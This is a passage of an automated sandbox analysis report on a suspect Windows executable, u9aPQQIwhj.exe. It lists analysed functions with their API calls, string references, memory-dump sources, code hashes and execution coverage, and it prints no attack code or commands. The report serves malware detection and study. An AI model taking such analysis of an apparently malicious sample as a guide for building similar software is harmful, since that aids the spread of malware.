API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,004037F4,74DF3420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: u9aPQQIwhj.exePID: 7880, Parent PID: 7404COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	28
Total number of Limit Nodes:	3

Executed Functions

Function 39043158 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 39043857
$^q, xrefs: 3904382E
$^q, xrefs: 3904387B
$^q, xrefs: 39043863
$^q, xrefs: 3904383A
$^q, xrefs: 39043887

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 1602d41266cc469af1328f587357bf3781dab2b56df1c4daa7ea3df27d84ecf8
Instruction ID: 05e02ab5add3ce33c8b40283f252d7ea6fc6479bfe7a0fbc1c495db3f4e6163a
Opcode Fuzzy Hash: 1602d41266cc469af1328f587357bf3781dab2b56df1c4daa7ea3df27d84ecf8
Instruction Fuzzy Hash: B6323031E1071A8FCB14DF74C99459DF7B6BF89340F509AA9D409AB224EB70AD85CF81

Function 0015B21D Relevance: 3.0, Instructions: 3024COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538bdda4ae21519b2564e899d37cd542f445f86990c21bf662c6cd8fe77263fd
Instruction ID: bac896c7e7a8175aff3d29ccdea6e711cb5350a920d5ae5871766bccd8808f2e
Opcode Fuzzy Hash: 538bdda4ae21519b2564e899d37cd542f445f86990c21bf662c6cd8fe77263fd
Instruction Fuzzy Hash: 8963F931D10B1ACEDB11EB68C8406A9F7B1FF99300F55D79AE4597B121EB70AAC4CB81

Function 39047E40 Relevance: 3.0, Strings: 2, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 390483DB
$^q, xrefs: 390483E7

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 818ec7dd42d2b5ec9d9d1dcf10e8cabd4261f737f574d494c1b2d953ef3ea802
Instruction ID: b8400a182816c3cd226e520f30470ee8c7f6f7827563d9795609b8efb40789f1
Opcode Fuzzy Hash: 818ec7dd42d2b5ec9d9d1dcf10e8cabd4261f737f574d494c1b2d953ef3ea802
Instruction Fuzzy Hash: 9E028B34B002059FDB04DB69D99069EB7E2EF84344F148DB9D809AB395DB35ED86CF81

Function 0015E360 Relevance: 2.8, Strings: 2, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0015E45E
Xbq, xrefs: 0015E477

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 41f01b32f92fa3933133d76377a7f6550be017b248b30c0e6f1c5c1cf342e91f
Instruction ID: 1cc4601f10668707b9bd57bda2d5fe51a73a86ea1e77f74583187e7d8374d6c4
Opcode Fuzzy Hash: 41f01b32f92fa3933133d76377a7f6550be017b248b30c0e6f1c5c1cf342e91f
Instruction Fuzzy Hash: 56B1E270B04258CFDB1CAB7C885427E7BA7BFC8740B15852ED466EB398CE349D069792

Function 39042370 Relevance: 1.0, Instructions: 1043COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fefda88f6cade096dcd5936551d74997778ce8bf9b8f7c05efcb0b757a79a28
Instruction ID: 30e2914d9317dc5f0c9a2354479cfba9681d9180bd634866ac2f382d04f83be7
Opcode Fuzzy Hash: 7fefda88f6cade096dcd5936551d74997778ce8bf9b8f7c05efcb0b757a79a28
Instruction Fuzzy Hash: 2CA21538A002448FDB24DB68C584B4DB7F2FB49354F5588A9E449EB361DB75EC86CF81

Function 390466C0 Relevance: .8, Instructions: 816COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b79a1315918d36ee211e8e4c027487494e6bbff5dc780611811846506bb689
Instruction ID: 43fb96eb5c1a024b5cdfbe70304ea93dfa447097f1f49390da117b16a282e51d
Opcode Fuzzy Hash: 15b79a1315918d36ee211e8e4c027487494e6bbff5dc780611811846506bb689
Instruction Fuzzy Hash: 09627B35A002049FDB04EB68C594A9DB7F2EF88354F5489B9E406EB351EB35EC86CF81

Function 3904C240 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7797d25c3f35fc69f86fe7e02d76138cfa5062266538c0d29aa15c9b22a86968
Instruction ID: 27f99378eb62906819e518fb9aa0d23ce5c9f418bf5978246d2c7c22b81504bc
Opcode Fuzzy Hash: 7797d25c3f35fc69f86fe7e02d76138cfa5062266538c0d29aa15c9b22a86968
Instruction Fuzzy Hash: 48329F34B002159FEB05DB68D981A9EB7F2EB88350F108979E506EB351DB35EC468F91

Function 390456A0 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5e4f609bd662d22e3393eb2f13b5ddd9c9ba5e6efe3b4ae56c1df4c56b35a9
Instruction ID: 2b936aa4a1630efa94f74476c56ff430fe3466e7841ac0f42275455db6e25796
Opcode Fuzzy Hash: fb5e4f609bd662d22e3393eb2f13b5ddd9c9ba5e6efe3b4ae56c1df4c56b35a9
Instruction Fuzzy Hash: 0F12B035F002459FEB149BA4C88469EB7F2EF85354F2488B9D44AEB385DE34EC46CB91

Function 3904B2F0 Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773a0c85904af830d4b9b19bfc4e3f34010f61614c60b88d7982a21ed3aae351
Instruction ID: da4a8185f34503f10899cd853e391c9b44147b51b257ec2a7568a2933f862a8f
Opcode Fuzzy Hash: 773a0c85904af830d4b9b19bfc4e3f34010f61614c60b88d7982a21ed3aae351
Instruction Fuzzy Hash: 66226274A0024A9FEB14CB68C49179DB7F2EB89350F208D76E445EB391DA35EC85CF92

Function 00154A58 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf2e503e5ad4a734dcbfbe49cdff9626866e63874a653b1e98b95c2db65ffcc
Instruction ID: 75aba3c128683f88c8994f22a13c2912f5cb4cf14b2f88bee203087a21a5052d
Opcode Fuzzy Hash: 5cf2e503e5ad4a734dcbfbe49cdff9626866e63874a653b1e98b95c2db65ffcc
Instruction Fuzzy Hash: E4B15270E00209CFDF14CFA9D9957DDBBF2AF88319F148129D865EB254EB749889CB81

Function 00153E40 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb0050ee95a0bdcbfec4188c8bef0c5fa65c127d4de6b1014201b7389c3629a
Instruction ID: fe2e7070a98cbe8c617ab2d1f7b8fa1e04983c66ff7c65125aa3a0250d0a76ed
Opcode Fuzzy Hash: cdb0050ee95a0bdcbfec4188c8bef0c5fa65c127d4de6b1014201b7389c3629a
Instruction Fuzzy Hash: 63918270E00209CFDF14CFA8C9857DDBBF2AF48345F148529E825EB294EB749989CB81

Function 3904AD98 Relevance: 12.9, Strings: 10, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 3904AEC5
$^q, xrefs: 3904AF0C
$^q, xrefs: 3904AF18
XM, xrefs: 3904B24A
$^q, xrefs: 3904AEB9
$^q, xrefs: 3904AF64
XM, xrefs: 3904B169
$^q, xrefs: 3904AF70
$^q, xrefs: 3904AF3B
$^q, xrefs: 3904AF47

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312705433
Opcode ID: dbd358cd2cb3bc1ef2ce6f9de5b5f66ce7bdb75a542a27459008c668b51e7cd3
Instruction ID: 6bfeaa71785c5330ea81cb45b63b356bf148aab130eff95f9c2fb349208aed77
Opcode Fuzzy Hash: dbd358cd2cb3bc1ef2ce6f9de5b5f66ce7bdb75a542a27459008c668b51e7cd3
Instruction Fuzzy Hash: 75E17B34A0020A8FEB15DFA9C58169EB7F2EF88340F208979D419AB355DB35EC46CF91

Function 3904B718 Relevance: 8.0, Strings: 6, Instructions: 467COMMON

Download Yara Rule

Strings

$^q, xrefs: 3904BC8D
$^q, xrefs: 3904BCCD
$^q, xrefs: 3904BC99
$^q, xrefs: 3904BC65
$^q, xrefs: 3904BCC1
$^q, xrefs: 3904BC59

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: b13f565c58ebdeb630af5dcb5fc39f0e1188f851afc3c6720fb7e1b7cdcc8bed
Instruction ID: 8a221f1199f4bcf08496149b29334db81472413f5b1cad45abbceec11c66efbd
Opcode Fuzzy Hash: b13f565c58ebdeb630af5dcb5fc39f0e1188f851afc3c6720fb7e1b7cdcc8bed
Instruction Fuzzy Hash: D7026D34A0024A8FEB14DF68C580A9DB7F2FB85354F1089BAD409EB251DB35ED96CF91

Function 3889320C Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3889328E
GetCurrentThread.KERNEL32 ref: 388932CB
GetCurrentProcess.KERNEL32 ref: 38893308
GetCurrentThreadId.KERNEL32 ref: 38893361

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f1f37265ae5f1f98ac79fc24058d761eff6069e16b08a89ea99eecc9158b0015
Instruction ID: f658581b1d89bdb7febe49312e8fe60c1010755a7f16e9abafd24c2b5524418a
Opcode Fuzzy Hash: f1f37265ae5f1f98ac79fc24058d761eff6069e16b08a89ea99eecc9158b0015
Instruction Fuzzy Hash: FC5135B09006498FDB04DFA9D948BDEBBF1EF88304F208459E459B72A0DB389985CF65

Function 38893210 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3889328E
GetCurrentThread.KERNEL32 ref: 388932CB
GetCurrentProcess.KERNEL32 ref: 38893308
GetCurrentThreadId.KERNEL32 ref: 38893361

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6a591d5f383748d7cfde42f5cede8c8b161d9c6bb860c46529872cf03b1458e8
Instruction ID: 0f21758ff1298ef5cf6b9c50eb16b43f43e2b6d7a3d05181469de409da7e2135
Opcode Fuzzy Hash: 6a591d5f383748d7cfde42f5cede8c8b161d9c6bb860c46529872cf03b1458e8
Instruction Fuzzy Hash: 735146B09006498FDB04DFA9D948BDEBBF1EF88304F208459E459B73A0DB389985CF65

Function 39049210 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 3904928C
$^q, xrefs: 390492C7
$^q, xrefs: 39049280
$^q, xrefs: 390492BB

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 982135423185b9a0a27739fc7bb10567f5a4963ff9c36700f527b09a0ffeed90
Instruction ID: 1d2593434040a242191a8c709e498f3d22041b3b0eefa78bec2458e527277de8
Opcode Fuzzy Hash: 982135423185b9a0a27739fc7bb10567f5a4963ff9c36700f527b09a0ffeed90
Instruction Fuzzy Hash: D4917F34B4020A9FDB54DB64C9507AEB3F6AFC8744F1089B9C519EB344EA30EC468F92

Function 3904D008 Relevance: 4.5, Strings: 3, Instructions: 797
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 3904D407
$^q, xrefs: 3904D3FF
$^q, xrefs: 3904D413

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 73c5816b749c99096a52d979095c8decb9bfcdea93910386bbacef0b40c5852f
Instruction ID: 92935455596512e902f68204ef1525f6ce69f978dc006499b4f44089393a440d
Opcode Fuzzy Hash: 73c5816b749c99096a52d979095c8decb9bfcdea93910386bbacef0b40c5852f
Instruction Fuzzy Hash: 276219356002069FCB15DB68D590A4EB7F2FF84344B218A69D0199F369DB71FD8ACBC1

Function 39044C68 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 39044C93
\Ocq, xrefs: 39044E43
XPcq, xrefs: 39044DB9

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

